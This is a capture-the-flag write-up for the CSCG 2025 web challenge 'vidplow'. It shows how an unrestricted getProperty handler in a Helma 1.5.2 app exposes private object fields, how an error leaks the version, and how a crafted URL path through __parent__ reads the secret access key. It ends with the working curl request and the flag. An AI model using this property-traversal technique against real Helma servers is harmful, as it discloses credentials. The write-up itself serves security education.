vidplow - CSCG 2025 - Write-Up
Find a Information Disclosure vulnerability.
This challenge is named “vidplow” and is in the Web Category. It is rated as medium and created by Popax21.
Intro
We recently stumbled upon an exposed SVN server of a large multimedia corporation, containing some of their backend application and internal tooling code. However, the access keys seem to not be the ones used in production - the real ones should fetch us quite a high price though, if we manage to get our hands on them that is. Just one problem - the tech stack seems to be really obscure, and no one on our team seems to have any clue what the heck is going on. Can you take a look, and maybe find some vulnerabilities in this thing?
For this challenge, you are provided with the source code.
The code provided is the source code of a Helma application, it’s a simple web application framework. You can verify that by looking at the /manage/makekey page, this page allows you to generate new passwords for the Helma management console which should be available for every Helma instance.
Vulnerabilities
If you check the properties.js in the Video object, you will find the getter function used to retrieve a property. These objects describe how the web pages inherently are displayed. The folders of the app represent the structure of the content and the site is basically built to match the content objects.
1
2
3
4
5
6
7
function getProperty(name) {
if (name == "category") {
return this._parent;
} else {
return this[name];
}
}
This function allows you to get any property of the element, you can for example access the _parent object like above not with category but with _parent. With this vulnerability we have unrestricted access to the properties of a Hop object.
You can check the source code of the Hop object here, after line 918, you can see the private properties of the Hop object. You can check if they work for a property of a video. Some of them are retrievable others not, of particular interest are two the _parent and the __created__.
1
2
/Documentary/Music+Documentary/Rock+%26+Riot%3A+The+Samurai+Years/_parent
> /Documentary/Music+Documentary/
or
1
2
Documentary/Music+Documentary/Rock+%26+Riot%3A+The+Samurai+Years/_id/
> 18
The idea now is to use a property to access the global node, because if you check functions.js, you will see that the accessKey, which is the flag is saved in that object.
1
2
3
4
5
6
7
8
9
10
function checkAccessKey(key) {
if (key == global.getProperty("accessKey")) {
return true;
} else {
res.reset();
res.status = 401;
res.write("Invalid access key");
return false;
}
}
If you further inspect properties.js in the Property folder, you will see that the getProperty function allows you to access even properties of a property.
1
2
3
4
5
6
7
8
function getProperty(name) {
var prop = this.obj.getProperty(this.name);
if (prop && prop.getProperty) {
return prop.getProperty(name);
} else {
return null;
}
}
So for example you could request /_parent/name to get the name of the parent Hop object.
To get the version of the running Helma application, you can use the __created__ property. This will trigger an error leaking the version 1.5.2:
1
2
Error in application vidplow
Invalid JavaScript value of type java.util.Date (/usr/local/helma-1.5.2/apps/vidplow/HopObject/handler.js#2)
Note: This version is quite important because in the new version _parent and __parent__ are the same.
Exploit
With the vulnerabilities we’ve identified, the next step is to find a way to access the global object. Through experimentation, you’ll discover that the __parent__ property is a reference to the global object.
In the Helma source code, under src/helma/scripting/rhino/debug/VariableModel.java, you’ll find the implementation of the __parent__ property. This property provides access to global properties, including accessKey, which contains the flag.
Command for successfully finding the flag.
1
curl https://740bad955fd62aeccf2924c3-8080-vidplow.challenge.cscg.live:1337/Documentary/Arasaka%3A+The+Iron+Legacy/__parent__/accessKey
Flag:
1
dach2025{wh0_n33ds_n0de_j5_anyw4y_edabc46f6280250fc7e646dee1a3937c}